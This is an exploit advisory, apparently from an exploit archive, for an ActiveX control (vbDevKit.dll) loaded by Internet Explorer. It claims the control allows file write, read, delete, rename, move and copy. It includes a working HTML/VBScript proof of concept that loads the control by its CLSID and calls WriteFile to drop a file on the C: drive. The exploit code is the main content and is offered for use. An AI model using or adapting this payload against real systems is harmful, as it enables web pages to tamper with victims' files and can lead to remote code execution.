Microsoft Internet Explorer vbDevKit.dll Active-X control code execution exploit.
ae5dc9de4a18ddc92f46faa9b54c22902ce0b958eae97535e533c3b5946f4a19
#######################################################################
IE vbDevKit.dll ActiveX Control Multti Remote Code Execution
#######################################################################
#[+]Date : 22 January 2010
#[+]version : all versions
#[+]Author : ahwak2000
#[+]Contact : z.u5[at]hotmail.com
#[+]Geetz [2] : germaya_x
#[+]tested on : windows xp sp2&sp3 EN
#[+]Reference : https://downloads.securityfocus.com/vulnerabilities/exploits/35725.pl
#[+]1. Is this for the COMRaider ActiveX bug? yes
#[+]2. Was this bug discovered by you? yes by me
#######################################################################
you can Write,Read,Delete,Rename,Move and Copy File
exploit Write file
<html>
<p>
<object classid='clsid:9A077D0D-B4A6-4EC0-B6CF-98526DF589E4' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\vbDevKit.dll"
prototype = "Sub WriteFile ( ByRef path As Variant , ByRef it As Variant )"
memberName = "WriteFile"
progid = "vbDevKit.CVariantFileSystem"
argCount = 2
arg1="c:\ahwak200.txt"
arg2="ahwak2000"
target.WriteFile arg1 ,arg2
</script></p>